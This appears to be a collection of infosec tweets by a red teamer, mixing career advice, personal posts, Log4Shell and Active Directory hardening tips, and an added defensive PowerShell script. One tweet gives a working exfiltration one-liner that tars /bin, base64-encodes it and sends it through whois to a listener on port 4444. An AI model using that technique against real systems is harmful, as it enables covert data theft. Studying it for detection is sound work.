If you have ever learned anything from me at all, I challenge you to pay it forward. I didn't get to where I am by standing on the shoulders of giants, I got here by learning tidbits from hundreds of tweeters, bloggers, podcasters & presenters who chose to share their knowledge.
"I'm sorry to bother you, but your CPU is hotter than the surface of the sun. This may shorten your CPU's lifespan if this continues -- Windows 10" - (source: )
Dear %Companies%, A single security minded Sys Admin is worth more than a handful of pentesters. Please start investing in the admins you already have. I say this as a pentester who has seen the impact that an empowered admin can have.
I want to make something very clear to the #infosec community. Just because you aren't deeply technical, a pentester, a red teamer, a forensics expert, or RE wiz doesn't mean that you can't teach people things. Everyone's life experiences are different and the more we 1/4
First: ncat -k -l -p 4444 | tee files.b64 (tee to a file so you can make sure you have it)
Next: tar czf - /bin/* | base64 | xargs -I bits timeout 0.03 whois -h 192.168.80.107 -p 4444 bits
Finally: cat files.b64 | tr -d '\r\n' | base64 -d | tar zxv (to get the files out)
Just watched the lady in front of me at the DMV give a USB stick to the clerk and say that all of her proofs of ID were "digital". The clerk proceeded to plug in the USB and copy the files to his desktop, then open them. 1st) I'm curious if she is in the job market. 2nd)
My kids and their friends are having a LAN party and they think I'm totally weird for calling it that... but they are all playing the same game, on their own computers, in the same room in which most do not live. == LAN party yes?
Today I joined the @BHinfoSecurity security team! Super excited to join this League of Extraordinary Hackers. Thanks to everyone who reached out and sent DMs about positions.
Hey @defcon - what about T-shirts or Hoodies with these QR codes on them. One says "DO NOT TAKE PHOTOS AT DEF CON" the other says "I DO NOT CONSENT TO THIS PHOTO OR VIDEO". Which due to the camera apps auto reading QR codes should pop up this message if you happen to be in-frame.
Just tried this out and it works! Next time you get a vendor email, reply with this: (code here: ) with a subject line of "Mail Delivery Subsystem - Address Not Found" (make sure to clear out the "RE:" and other subject line :)
is back online. It's an egress testing tool that you can hit via UDP, HTTP, HTTPS, or SSH on any port via IPv6 or IPv4 and you will always get back `w00tw00t` for verifiable responses.
10 #Log4Shell Facts vs Fiction: a 🧵
1. 1.x is NOT vuln to this RCE. While it doesn't have another RCE, it requires access to send serialized data to a listener ON the log server. This is much MUCH harder to exploit and kind of rare for a Log4j server to be running.
One of my favorite interview questions is asking someone what they believe the top 10 security issues companies have today. You will know exactly how much experience, forethought, maturity, and technical skill someone has just from that one question.
To all looking into the SolarWinds Orion breach: Orion holds credentials, such as Domain Admin, Cisco/Router/SW root/enable creds, ESXi/vCenter Credentials, AWS/Azure/Cloud root API keys. and so much more. CONSIDER THESE CREDENTIALS COMPROMISED if you see other IOCs #SunBurst
Today was my last day of work at Cruise :( . I'm part of a lay-off :/ So yah... looking for work. I know the US is at a crazy unemployment rate and probably very few are hiring but if you know of anywhere looking to add to their internal red team, security trainer, SMB CTO/CISO/
If you run a CTF and one of your challenges is a zoomed out fuzzy picture of 4000 lines of Base64 in the Wingdings font, you are a monster and should feel bad about yourself.
Your biggest obstacle in this world is yourself. Self doubt is beaten by ignoring it. It's dumb and useless. You are amazing and can do anything you let yourself achieve. I believe in you.
#infosec career advice. If all you ever do is fight fires all day, the best you can ever hope to learn is to be more efficient at fighting fires. You will never learn new ways to fight fires. Always schedule time for yourself during your day to just learn. #alwaysbelearning
My Metasploitable 3 CTF Start to Finish walk-through of all the challenges including CTF setup/prep, and alternative solutions: (Now downloadable/printable/copy allowed)
Cracking NetNTLMv1/v2 using NTLM hashes w/ Hashcat - this is epic! >
If you have a ton of NTLM hashes lying around, even if they aren't cracked, this could make them useable much quicker than trying to crack them to clear text.
The biggest career advice I can give anyone in Infosec is to document/brag about your successes. I feel safe in saying that any manager I have had would vouch for the fact that you have to usually pry it out of me. Which isn't humble, it's stupid. [1/2]
Posted my "Practical Cryptography for Infosec Noobs" slides for @shmoocon 2022 here:
I know I went fast so here are all of the slides so that you can get each of the links and details.
Broadcom CEO telling VMware folks to return to the offices "or else" is not gonna end well. If you are a VMware shop, are y'all worried at all or just expecting to roll through?
Learned something new today. If you decrease the WiFi power so it doesn't extend as far, magically your kids come out of their rooms in search of better signal...
#UnpopularOpinion I don't believe that anyone's first career should be pentester or red teamer. Ethics, maturity, empathy and technical practice are all things I feel are base requirements for the job and aren't things you can have in your first few years of working in IT/Sec
Hi. I'm hiring for my team. 3 spots open, not all of the requirements are requirements. Flexible on the Senior part too. What I'm looking for is the stuff I can't teach. Drive, empathy, and the ability to learn quickly and dig deep.
I feel that I am better at red teaming because I was a SOC Analyst, I was tech support, I was help desk, I was a sys admin. More than any college degree or certification, or technical knowledge I have, empathy and knowing how things work has made me a better tester.
If you haven't yet, as soon as possible run the following command on ALL of your AD CAs:
certutil.exe -setreg CA\AuditFilter 127
This will enable all of the logging you will need to catch many of the attacks detailed in @harmj0y @tifkin_'s awesome work
This is my friendly reminder that you are not alone and you are awesome. If you can see this then you have my permission to contact me to talk about whatever you need to, whenever you need to.
If you have LDAP servers inside your network, or trust external 3rd-party ones, and either of them allow the schema attributes javaClassName, javaCodeBase or javaSerializedObject as writable, you should be making sure attackers aren't using them for #Log4j #Log4Shell
A home lab is not a requirement to getting a job in Infosec. Spending money on something like that is an investment in you learning technical skills, but so is a cloud account with free credits and @hackthebox_eu and @RealTryHackMe and a hundred different resources. 1/2
Ladies and Gents, my life goal is to graduate from @wgu by the end of this year. To do that I'm going on hiatus. No games, or social media. No streams or TV shows. The next post you see from me should only be two words. "I'm done". See you soon.
One of the smallest changes with huge effect you can make to Active Directory to help secure it against a LOT of attack paths is changing the attribute ms-DS-MachineAccountQuota = 0. Do this now, do it on Monday, but adds a pretty decent barrier to many attack paths.
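As an added example for this page (not the tweet author's own script), the change above written out so it can be checked and applied from any domain-joined admin workstation with the RSAT ActiveDirectory module. The second half is the part people tend to skip: computer objects that were created by ordinary users through the quota carry a populated mS-DS-CreatorSID, so listing them shows what the quota has already been used for before you turn it off. The only assumption is that the account running it can modify the domain object.

```powershell
# Added example, not the tweet author's code. Requires the RSAT ActiveDirectory module
# and an account permitted to edit the domain naming context.
Import-Module ActiveDirectory

$domain = Get-ADDomain
$dn     = $domain.DistinguishedName

# ms-DS-MachineAccountQuota is an attribute of the domain object itself (default 10).
$quota = (Get-ADObject -Identity $dn -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
Write-Output "ms-DS-MachineAccountQuota on $($domain.DNSRoot): $quota"

if ($quota -ne 0) {
    # Setting it to 0 stops every non-privileged user from joining machines to the domain.
    # Provisioning then has to go through delegated joiners or pre-created computer objects.
    Set-ADDomain -Identity $domain -Replace @{ 'ms-DS-MachineAccountQuota' = '0' }
    Write-Output 'Quota set to 0.'
}

# mS-DS-CreatorSID is only stamped on a computer object when a user without
# Create Child rights joined the machine by consuming their quota, so this list is
# exactly the set of machines the quota was used for.
Get-ADComputer -LDAPFilter '(mS-DS-CreatorSID=*)' -Properties mS-DS-CreatorSID, whenCreated |
    ForEach-Object {
        # The attribute is stored as a binary SID; decode and resolve it to a name if possible.
        $sid = New-Object System.Security.Principal.SecurityIdentifier($_.'mS-DS-CreatorSID', 0)
        try   { $creator = $sid.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $creator = $sid.Value }   # deleted or foreign principal: keep the raw SID
        [pscustomobject]@{
            Computer  = $_.Name
            Created   = $_.whenCreated
            CreatedBy = $creator
        }
    } | Sort-Object Created -Descending | Format-Table -AutoSize
```

Review the resulting list before and after the change: any machine created by an account that should never have joined computers is worth a closer look, and the list should stop growing once the quota is 0.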
Please make sure to patch your Windows systems. CVE-2020-16938 is no joke. Hard Drive encryption does break this attack, however, most servers and virtual machines don't have HDD encryption enabled. Patch! #ntdsdit op: @jonasLyk
Releasing an NFS client today, it's written in Go, has file list, upload, download, delete, make directory and delete directory functions without having to mount the drive or permissions (locally) to do so. This can be super helpful from a Win host.
80% of pentest firms/redteams that I've been a part of don't have operational documentation even close to what was posted of the google translated Conti playbook. I'm part of that problem so let's all #DoBetter #BeBetter #DocumentBetter
This is year 2 of holidays during a pandemic. My DMs are open and I am here if you just want to talk to someone and not feel alone. I am here if you need to scream and yell and tell someone that it hurts. I am here. You are not alone.
to be a hacker. My call to action is this; I would like to see more people submitting talks. Screw what CFP boards think of your talk. They make decisions based on what they want their conference to be, not how good your talk is. You are amazing & I want to hear every word. #Love
Thanks for all the support, I will respond to messages. I had a 48 hour exam this weekend so I disconnected, focused on family, the exam and getting my head right. On a positive note; I passed the Red Team Operator exam! by @zeropointsecltd @_RastaMouse
Post-Pentest Depression is where you start doubting all of the things you did and slapping yourself for all the mistakes you made, or things you forgot to check. Am I alone in this or anyone else get this?
Friendly reminder to not copy and paste random strings into a shell from the Internet and especially Twitter and ESPECIALLY on to production servers to "search for vulnerable Log4j"
If you pentest, red team or defend windows environments, this should be required reading. Wish I was in the room when this talk was presented. Please @hackinparis release this video ASAP. :)
#IncidentResponse challenge: Here is a spam email that made it through Google's spam filter. Which of the headers are actually real and which ones are fake? Can you spot the cool trick that this spammer is using?
Cool powershell trick I learned today: " gci C:\users\*\* " lets you know which user's home directories you have access to and what's in the first level.
Advanced Red Team EDR evasion technique:
1. Don't run your malware on a box that is monitored by EDR.
2. Tunnel all of your other attacks through the box without EDR
3. Gain access to everything via weak IAM controls (Active Directory)
4. End engagement
Did I miss anything?
Dear Pentesters, don't be lazy/sloppy and leave files, registry keys, cron jobs everywhere. Do your best to clean up everything you put down.
#ZeroContextTweets #DEFCON26 #BlackHat2018 #BSidesLV advice: just because they are on stage or in front of the class doesn't mean they know what they are talking about. Challenge everything, test it yourself. This however doesn't give you the right to treat anyone as less than respectful. They 1/n
Anyone know a good way to help a neurotypical person understand executive dysfunction? Just saying "it's like you want to do something but you can't" isn't really landing.
To all. If you ever find yourself in a situation at a conference or place I'm at and need me to call you or pick you out of that situation. DM me for phone number so that you have it and can use it in that situation. I will show up.
To all of you working on #log4j today, a Friday, you are appreciated. You are awesome. Thank you for doing the work that needs to get done when it counts. Security is often a thankless job. So thank you for today.
Played a bit with @CertSG's FIR project (Fast Incident Response). Took me about 40 minutes to get set up and it's a fully functional Incident Response tracking platform w/ metrics! + right price: FREE ;-)
Today a student of mine couldn't find the desktop of a user on the Windows XP box he exploited because it didn't have a C:\Users directory. I felt sooooo old…
This is a blog post that ALL pentesters/red teamers should save in their favorite offline knowledge base (evernote, keep, wiki, etc). Do it now, future you will thank me.. or more correctly Damien King (the author). Seniors: go stuff this down your junior tester's throats ASAP
I have grown to love TMUX but its ability to log console output is atrocious vs SCREEN. Here are my two setup guides for myself. Screen logs ALL sessions automatically, and even through the PIA setup for TMUX you still have to enable it every single time....
"It's almost like people are making more money teaching hacking than actually doing it." -- @assume_breach
^ 100% true statement, and most don't teach good habits, they teach run and gun cowboy BS.
I wish certifications didn't have arbitrary expiration dates, but instead had big, bold "issued on" dates. That way certification companies couldn't milk you for "CPE"s (which for some reason you can "pay" for..) & hiring companies could see when you had that knowledge. Thoughts?
This tweet didn't age well. It was short sighted. For me, since people's decision to not get vaccinated has resulted in my father being hospitalized and my son possibly infected too... Go get the shot or stay home. Stop hurting other people. I'm tired. :(
I'm vaccinated. I think it's a good idea to do so and hope that others also get vaccinated. Obviously you can do what you wish, but whatever your decision is, I hope that you stay healthy and live a long life doing whatever you love doing for as long as possible.
If I was in charge of an entire company's security, the first large projects I would focus on are (in no particular order)
- asset management (can you tell me what this IP on your network is and does within 10 minutes)
Dear CTF challenge creators. If I have to guess a password, URL, hostname etc and it's not either in rockyou, dirbuster or other standard word list, you should confirm that it's in fact guessable in a short period of time by having a friend attempt it.
If you are on a Blue Team, or IT Team, and you aren't running BloodHound REGULARLY, you are doing yourself a disservice. As a CTO I would either get rid of AD, or have BloodHound statistics be a top KPI/OKR for my org.
I never realized how strong the rainbow had become as a symbol. 'been wearing a rainbow 🌈 mask around recently in public & it's been a small glimpse into the hate/disgust thrown at 🏳️‍⚧️ LGBTQ+ peeps. I now need LOTS more rainbow gear. I'm all about making bigots uncomfortable :)
Would you like to be a Certified Checkbox Unchecker as well? Now it's easy to get your CCU certification, sign up here: - It's the same esteemed certification body I received mine from: (Takes about an hour to process)
haven't seen or done personally. There is a lot of bravado out there. Many people speak on popping shells & APT like they are experts, that aren't, but when you share experience, real experience, we all get better. Shared knowledge, infinite curiosity, this is what it means 3/4
*IT* *IS* *NOT* *"USERS"* *JOB* *TO* *KNOW* *SECURITY* *BEST* *PRACTICES*… we all need to do better at earning our paychecks and make it so they can do their jobs securely (the ones they are paid to do) without having to think about it. #TheHillIllDieOn
You have my singular and undivided attention. You sent my son home on the day they were passing valentines around in class and he came home in tears... because your prejudices made you think my Asian child had the coronavirus. I hope you feel the vibrations of my rage.